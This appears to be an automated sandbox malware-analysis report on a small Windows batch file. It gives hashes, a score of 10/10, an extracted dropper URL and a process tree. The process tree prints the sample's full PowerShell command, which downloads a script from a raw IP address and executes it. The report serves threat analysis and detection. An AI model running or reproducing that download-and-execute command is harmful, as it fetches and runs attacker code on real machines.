Analysis
max time kernel: 127s
max time network: 149s
platform: windows10_x64
resource: win10v200430
submitted: 05-06-2020 10:10
Static task: static1
Behavioral task: behavioral1
  Sample: 08d62202634f8b1ef5c5b10ef8db5891.bat
  Resource: win7v200430 (windows7_x64)
  0 signatures, 0 seconds
Behavioral task: behavioral2
  Sample: 08d62202634f8b1ef5c5b10ef8db5891.bat
  Resource: win10v200430 (windows10_x64)
  0 signatures, 0 seconds
General
Target: 08d62202634f8b1ef5c5b10ef8db5891.bat
Size: 219B
MD5: 616c257a819adb60eed0688846b302cd
SHA1: bb40b235e005c837e96ba5ea9ceb2748952808ed
SHA256: 78996c71b494d4588386237c37101c663c8420c13e7615a1955195ef483a0e05
SHA512: bb70e6beb231053af8ebd208547aeac3efea4570339377530dd88d9dfae488c85adf06d515e90d2d99d76f16f8a5daac52992ebabcd08e1523d7569d224755d3
Score: 10/10
Malware Config (extracted)
Language: ps1
Source: URLs
ps1.dropper: http://185.103.242.78/pastes/08d62202634f8b1ef5c5b10ef8db5891
Signatures
Program crash (1 IoC)
  Processes:
    WerFault.exe  pid: 2160  target pid: 1880  target process: powershell.exe
Suspicious use of AdjustPrivilegeToken (3 IoCs)
  Processes:
    WerFault.exe  pid: 2160  Token: SeRestorePrivilege
    WerFault.exe  pid: 2160  Token: SeBackupPrivilege
    WerFault.exe  pid: 2160  Token: SeDebugPrivilege
Suspicious behavior: EnumeratesProcesses (14 IoCs)
  Processes:
    WerFault.exe  pid: 2160  (14 occurrences)
Processes
1. C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\08d62202634f8b1ef5c5b10ef8db5891.bat"  (PID: 1628)
   2. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/08d62202634f8b1ef5c5b10ef8db5891');Invoke-FGMKPKSTXRLT;Start-Sleep -s 10000"  (PID: 1880)
      3. C:\Windows\SysWOW64\WerFault.exe -u -p 1880 -s 704  (PID: 2160)
         - Program crash
         - Suspicious use of AdjustPrivilegeToken
         - Suspicious behavior: EnumeratesProcesses